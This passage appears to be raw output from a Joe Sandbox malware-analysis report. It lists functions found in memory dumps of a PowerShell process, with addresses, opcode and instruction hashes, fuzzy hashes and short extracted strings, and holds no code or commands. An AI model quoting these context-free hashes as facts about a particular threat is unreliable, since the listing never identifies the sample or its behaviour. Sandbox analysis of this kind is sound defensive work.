                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 279a8219b7d53cfb9c5c73f9f49e86d5d05634f7fac92de26918d9427e71a810
                                                                                                                    • Instruction ID: ffe2000670e61d2d68535e54e638a390413d1a69564f911d400069a2676962d6
                                                                                                                    • Opcode Fuzzy Hash: 279a8219b7d53cfb9c5c73f9f49e86d5d05634f7fac92de26918d9427e71a810
                                                                                                                    • Instruction Fuzzy Hash: 8111B6F6E0021ADBCF348E6985842FBF7F4BF48610B258566DC1AEB604D730D904C7A0
                                                                                                                    Function 07DB43F0 Relevance: 1.9, Strings: 1, Instructions: 681COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: db522b2a6d32ff0b033ee251565883fbe77938e4d4ea110477519c37a70ef950
                                                                                                                    • Instruction ID: 5aeb896574ea25334aeed102c20d8ef666f2e9f51491b48e4839e0d8856458ef
                                                                                                                    • Opcode Fuzzy Hash: db522b2a6d32ff0b033ee251565883fbe77938e4d4ea110477519c37a70ef950
                                                                                                                    • Instruction Fuzzy Hash: 925217B4A00245CFDB24CB98C591AAEFBB2BF85304F15C099D90A9F356CB76EC45CB91
                                                                                                                    Function 07DB4653 Relevance: 1.8, Strings: 1, Instructions: 530COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: 243b62483b3f103ae91cd820fd0e23019feb5d626485e3b790f4bba3982ab3ea
                                                                                                                    • Instruction ID: 8dca69f0081ecb21168af47f72b0b64f5d51facc882ef3e62f89154e02c0bca2
                                                                                                                    • Opcode Fuzzy Hash: 243b62483b3f103ae91cd820fd0e23019feb5d626485e3b790f4bba3982ab3ea
                                                                                                                    • Instruction Fuzzy Hash: FC2217B4A00245CFDB24CB98C591EAEFBB2AF85314F15C099D90A9F356CB76EC45CB81
                                                                                                                    Function 07DB4C3F Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: d6be280a2732eed92764cb8cd9f91594a86e1f289d44afd5f32a1f2cae696538
                                                                                                                    • Instruction ID: 713c08e38de0efea6b932962c0a47669e5105922b0228c12a6c6e8beb987d17b
                                                                                                                    • Opcode Fuzzy Hash: d6be280a2732eed92764cb8cd9f91594a86e1f289d44afd5f32a1f2cae696538
                                                                                                                    • Instruction Fuzzy Hash: D81239B4A00245CFDB24CB98C591EAEFBB2AF85304F15C099D90A9F356CB76EC45CB91
                                                                                                                    Function 07DB4974 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: 13ce47f2353b2e78a4d0f635a51eff469fa181e9a1a4aec079e0837d7874d4e8
                                                                                                                    • Instruction ID: 84e21338aa9c26bdd7486e7b947730a66b4a0d890684579f156fe38e372d2f97
                                                                                                                    • Opcode Fuzzy Hash: 13ce47f2353b2e78a4d0f635a51eff469fa181e9a1a4aec079e0837d7874d4e8
                                                                                                                    • Instruction Fuzzy Hash: 3C1217B4A00245CFDB24CB98C591EAEBBB2AF85314F15C099D90A9F356CB76EC45CB81
                                                                                                                    Function 07DB1597 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: 30239187efea9353151342d994b3ad2f930b93724319121b5e5259ddc9d733f0
                                                                                                                    • Instruction ID: 941da890d231a5c00a08de4900fd0692a28580ba4ac9d08a7ef91d1ba716e10e
                                                                                                                    • Opcode Fuzzy Hash: 30239187efea9353151342d994b3ad2f930b93724319121b5e5259ddc9d733f0
                                                                                                                    • Instruction Fuzzy Hash: 79025074B00205DFDB24CB98C590FAABBF2AB85314F14C099E94A9F395CB72EC45CB91
                                                                                                                    Function 07DB12AC Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q
                                                                                                                    • API String ID: 0-1614139903
                                                                                                                    • Opcode ID: 92e5ed68f444a3b6b2698c1f31278ef00dcf725f9a92c6e8778435c01949aeff
                                                                                                                    • Instruction ID: b6f553504c94f0715450dff5510bde54fce9f6195ff17444c16a5c822c695988
                                                                                                                    • Opcode Fuzzy Hash: 92e5ed68f444a3b6b2698c1f31278ef00dcf725f9a92c6e8778435c01949aeff
                                                                                                                    • Instruction Fuzzy Hash: C1F14D74A01209DFDB14CB98C590FAEFBB2EB85314F14C099E90A9F356CB72EC458B91
                                                                                                                    Function 04F2E91D Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \VWm
                                                                                                                    • API String ID: 0-240642930
                                                                                                                    • Opcode ID: d63c03892faff7f163b63b9b8de7ec73b7fc8aa38cf03b2b3ab03762b45afef6
                                                                                                                    • Instruction ID: d45291b7bdf7cc3610ce44c23d5a13c5fe2a9fffbd9ecd8b45de5b2f99363f0a
                                                                                                                    • Opcode Fuzzy Hash: d63c03892faff7f163b63b9b8de7ec73b7fc8aa38cf03b2b3ab03762b45afef6
                                                                                                                    • Instruction Fuzzy Hash: B7B14D70E00229DFDB10CFA9DA9579DBBF1BF48314F248129E815A7254EB34A846CF91
                                                                                                                    Function 07DB714B Relevance: .4, Instructions: 446COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d3f085891cd1ba21cc668fcc3a9c4d08edbe3c9412b86afcd5e7284b2bdf320a
                                                                                                                    • Instruction ID: 6158abaeabcb28544f56e3637c8890212687c28c00c58e7784e61f13b4524782
                                                                                                                    • Opcode Fuzzy Hash: d3f085891cd1ba21cc668fcc3a9c4d08edbe3c9412b86afcd5e7284b2bdf320a
                                                                                                                    • Instruction Fuzzy Hash: D1027374A00215DFCB34CB58C991AAAFBB2BFC5310F14C59AD84A6B355CB72EC46CB91
                                                                                                                    Function 04F239B0 Relevance: .3, Instructions: 322COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ec93265c3dfbcdbf7d53220cd9c1e6b8c3a93a42598caddd3329e78af7c234a
                                                                                                                    • Instruction ID: f6cec7ab63271e2e9e51518e9d9b3904c6dea8fd3cab07614e3ab5a356bd6b09
                                                                                                                    • Opcode Fuzzy Hash: 9ec93265c3dfbcdbf7d53220cd9c1e6b8c3a93a42598caddd3329e78af7c234a
                                                                                                                    • Instruction Fuzzy Hash: 3ED10775A00218AFDB05CFA8D584A9DFBB2FF48310F258169E805AB365C735ED86CB90
                                                                                                                    Function 04F28CC0 Relevance: .3, Instructions: 318COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1bd8aae0fee95229c0285e9c4ebd3bf7355d476c1d6fe81e5ad47c645335d798
                                                                                                                    • Instruction ID: 4618ee6cdcb502ad43f4d3ec5fc695f3202c038822e981c20bd2c7f8845b70dc
                                                                                                                    • Opcode Fuzzy Hash: 1bd8aae0fee95229c0285e9c4ebd3bf7355d476c1d6fe81e5ad47c645335d798
                                                                                                                    • Instruction Fuzzy Hash: 10C1BE31B002189FDB14EFA5CA48A9DBBF2FF85344F158569E406AF365CB74AD4ACB40
                                                                                                                    Function 04F231C8 Relevance: .3, Instructions: 315COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0a8e8347007c479949d7edce679e73d83b47d613a3939dc88eee0492aa12616f
                                                                                                                    • Instruction ID: 455d123beda64ed8f71a4e802742090e56c36e8361aa3920bb0fe48548ea396b
                                                                                                                    • Opcode Fuzzy Hash: 0a8e8347007c479949d7edce679e73d83b47d613a3939dc88eee0492aa12616f
                                                                                                                    • Instruction Fuzzy Hash: 1CD12875E012199FDB05CFA8D584A9EFBF2EF48310F258159E808AB365C735ED86CB90
                                                                                                                    Function 07DB5D40 Relevance: .3, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d9f0e427c78767a9e15086811dd064b639a6159b3f068ca7f23f0c1179bb6eb
                                                                                                                    • Instruction ID: fe8287db8d35311c39d3eb79fe6757aa514be87a0ca1a2139f38fd9126ba6c89
                                                                                                                    • Opcode Fuzzy Hash: 8d9f0e427c78767a9e15086811dd064b639a6159b3f068ca7f23f0c1179bb6eb
                                                                                                                    • Instruction Fuzzy Hash: D9B16074B00215DFD724DB68D955BAEBBF3AF89300F148068D40AAF395CB76EC858B91
                                                                                                                    Function 04F2F1EC Relevance: .3, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: de017f895268ec0bb08380b1cdd1f2363f96a6204f69d0b85db86227a7a84713
                                                                                                                    • Instruction ID: cca06ecce8551d39396aa1b05bdf33cb2876df018868e4c6223adbd2ef50e908
                                                                                                                    • Opcode Fuzzy Hash: de017f895268ec0bb08380b1cdd1f2363f96a6204f69d0b85db86227a7a84713
                                                                                                                    • Instruction Fuzzy Hash: 95B17070E10219CFDB10CFA8DA857DEBBF1EF48314F248129D415EB294EB74A846DB91
                                                                                                                    Function 07DB5D20 Relevance: .3, Instructions: 251COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c9a67ef31f2b336a36df4ed59793885077d9f62de95d0382962c14523bd0d
                                                                                                                    • Instruction ID: 67de8a1a06bd8a0875497eec20461f6a98ed124e56a0e2825f672b3e05d93a42
                                                                                                                    • Opcode Fuzzy Hash: c78c9a67ef31f2b336a36df4ed59793885077d9f62de95d0382962c14523bd0d
                                                                                                                    • Instruction Fuzzy Hash: 6BA16FB4A00215DFD724CB64D955BAEFBF2AF89304F1480A9D4066F391CB76EC85CB91
                                                                                                                    Function 07DB7530 Relevance: .2, Instructions: 250COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8b0583883eda1b623a7dcdaca2293a13f56092f7274a7808804b00afb2203705
                                                                                                                    • Instruction ID: f96861b06c9bb1a54547ba74919a870a8a705d6ecef6f4fbd98ec38a81b14332
                                                                                                                    • Opcode Fuzzy Hash: 8b0583883eda1b623a7dcdaca2293a13f56092f7274a7808804b00afb2203705
                                                                                                                    • Instruction Fuzzy Hash: 16A15EB4E00616DBCB30CB54C591AAAFBB2BFC9720F14851BD8466B754CB71E846CB91
                                                                                                                    Function 04F28528 Relevance: .2, Instructions: 200COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 01aa980d74a846bbd33718176ffc5fd87f75a6688bbd19fb92a5861e7f181c63
                                                                                                                    • Instruction ID: a725f54298f4201df22eaa0f6932cb4c17c32e264deb320d87635c1faa8aba4b
                                                                                                                    • Opcode Fuzzy Hash: 01aa980d74a846bbd33718176ffc5fd87f75a6688bbd19fb92a5861e7f181c63
                                                                                                                    • Instruction Fuzzy Hash: 3381B034A012549FCB14DFB8D5849ADBBF2FF8A354F1885A9E4059B361C735EC46CB50
                                                                                                                    Function 04F238D0 Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7625d3794a48eaba9d7d3d3fcb8746407a7f6cad00b8b1bceff65055e6031ed1
                                                                                                                    • Instruction ID: d277e3000c2216c5e39119c12f2d0f2d527cd3690295fda669d8a2974a4af07b
                                                                                                                    • Opcode Fuzzy Hash: 7625d3794a48eaba9d7d3d3fcb8746407a7f6cad00b8b1bceff65055e6031ed1
                                                                                                                    • Instruction Fuzzy Hash: 0541F7B1E083959FCB02DF68C850999BFB1FF4A310B1640A6D444DB762D639AC46CBA1
                                                                                                                    Function 04F29219 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b584bc4a39c11902e4b4edd0652bc95db9b87f0a4cb5818f9da806537e913aa
                                                                                                                    • Instruction ID: bb4d9064bc668d20454fcc88fb87a2e96e7e42abc6f0bb9a2af502ae17429882
                                                                                                                    • Opcode Fuzzy Hash: 1b584bc4a39c11902e4b4edd0652bc95db9b87f0a4cb5818f9da806537e913aa
                                                                                                                    • Instruction Fuzzy Hash: 37417A35B002108FD714DB65C598EAEBBF2EF89351F09806CE546EB7A4CB75AC42DB50
                                                                                                                    Function 07DBA1B4 Relevance: .1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fbc9b319d5a1b8fd88ac09f64bfafa675a91e0904fdb228c7609a63745fc70ee
                                                                                                                    • Instruction ID: 9042b0086538cdd0e3af6fd272778acbb909b4bf510c136036b158c13f4caa10
                                                                                                                    • Opcode Fuzzy Hash: fbc9b319d5a1b8fd88ac09f64bfafa675a91e0904fdb228c7609a63745fc70ee
                                                                                                                    • Instruction Fuzzy Hash: 2C41D7B1A00312DFCB318F98C941BA9BBE29FC2310F19C4A9D846AF351DB36D845C7A1
                                                                                                                    Function 07DB804E Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8488e818db981671ac456f693c03ce36a99bc8f4497aa0e54ed9c2fb6ecf598f
                                                                                                                    • Instruction ID: 48906093e16d588d8a8db210d7fa6ca44a7f1e0530387a85d97607f4a6cf5947
                                                                                                                    • Opcode Fuzzy Hash: 8488e818db981671ac456f693c03ce36a99bc8f4497aa0e54ed9c2fb6ecf598f
                                                                                                                    • Instruction Fuzzy Hash: 2E317E34B412149BD714ABA8C955BAFBAA3AFC5300F108468E9066F391CEB6DC458BE5
                                                                                                                    Function 07DB0A78 Relevance: .1, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d5f8eb2ea82b2f7a88433836a8545988628867c1cf56bf86fd4a7a62bc5f2474
                                                                                                                    • Instruction ID: 64dce69591adfde93106b90f742e3ed3df3f60de8e4a6e861cc95aafc2929196
                                                                                                                    • Opcode Fuzzy Hash: d5f8eb2ea82b2f7a88433836a8545988628867c1cf56bf86fd4a7a62bc5f2474
                                                                                                                    • Instruction Fuzzy Hash: A2217771700316EBD7345AAAD850B7BFADA9BC4705F20882EA54ACF390CE36C8418365
                                                                                                                    Function 04F294E3 Relevance: .1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6d8b75f415748e1f6dbd714fe576582b0c529335c720443ab61a4bb335a53240
                                                                                                                    • Instruction ID: 241b5c4a43d14343108d32e0370095b72885ec6ac68a98d29a4840611cabdf8a
                                                                                                                    • Opcode Fuzzy Hash: 6d8b75f415748e1f6dbd714fe576582b0c529335c720443ab61a4bb335a53240
                                                                                                                    • Instruction Fuzzy Hash: E6316BB0E00219CFDB18DFA9C485B9DBBF2FF88304F148429C805AB694DBB5A842CF40
                                                                                                                    Function 04F23995 Relevance: .1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 22010ce9ea34cd71be152132b6b1612bbc31e097733d75dbea3b515cc72d9a5d
                                                                                                                    • Instruction ID: ad37af3c8b8d129858c81c6685432bac792905f5dee348664fbcd100b776c9d7
                                                                                                                    • Opcode Fuzzy Hash: 22010ce9ea34cd71be152132b6b1612bbc31e097733d75dbea3b515cc72d9a5d
                                                                                                                    • Instruction Fuzzy Hash: 7C316B74E042559FCB05CF99C9809AAFBB1FF49310B1585AAD808EB761C735EC81CFA1
                                                                                                                    Function 07DB0A73 Relevance: .1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d2263d8d89e2aabbe5573bce67a2b0fc1a469499864cdc17e92e84e875ff17d
                                                                                                                    • Instruction ID: 66e173b35557593301b9aebd83e063800f835dd362d0edd17a4c9c7a910195e7
                                                                                                                    • Opcode Fuzzy Hash: 8d2263d8d89e2aabbe5573bce67a2b0fc1a469499864cdc17e92e84e875ff17d
                                                                                                                    • Instruction Fuzzy Hash: A6119EB1700316B7D73409AAC944BBBFADA5B94704F248829A94ADF3C4DA79D9808375
                                                                                                                    Function 04F2319D Relevance: .1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6dec1e30952b1e88018ce4e497e01504710d144ee303fbfbcd8643cbf899b9fe
                                                                                                                    • Instruction ID: a29f7572409f0d63c84b86756c3302be14350479b15a2512656526062b978540
                                                                                                                    • Opcode Fuzzy Hash: 6dec1e30952b1e88018ce4e497e01504710d144ee303fbfbcd8643cbf899b9fe
                                                                                                                    • Instruction Fuzzy Hash: F8219DB4E052598FCB00DFACC99099EBBB0FF49310B15819AD859AB392C634FC45CBA1
                                                                                                                    Function 07DB0868 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bbdc0045f7b9609cc5f99e875ab61181ac050549c5c8af43832c5cb72ffb053f
                                                                                                                    • Instruction ID: f0a5bc1e86fe3174cfa2f15fde705ea08a59231d6522d19dca5947f22e9f9109
                                                                                                                    • Opcode Fuzzy Hash: bbdc0045f7b9609cc5f99e875ab61181ac050549c5c8af43832c5cb72ffb053f
                                                                                                                    • Instruction Fuzzy Hash: 1301D47A700216DBD73465AAE4005ABF79ADBC5262F14C43AD586CA250DA32CA4587E0
                                                                                                                    Function 04F2EC13 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4336ac4c2b2fa8d8ae58c9552deaf68a9781f125ecd16e2c7a7f6f2bbceb3e37
                                                                                                                    • Instruction ID: f9d4b51d9b9e3e38f620679f8f5b76f594c15afd450e28969140616fb9f6bdb4
                                                                                                                    • Opcode Fuzzy Hash: 4336ac4c2b2fa8d8ae58c9552deaf68a9781f125ecd16e2c7a7f6f2bbceb3e37
                                                                                                                    • Instruction Fuzzy Hash: 15117430D50168DFEF24DAD8EA987ECB7B1AB4531EF241429C001B6190AB74688BCB16
                                                                                                                    Function 04F22D5E Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b103a978f05b4717cf56d56464acbf8fbe9f2b1b24c9aee48b9da11a60a9370c
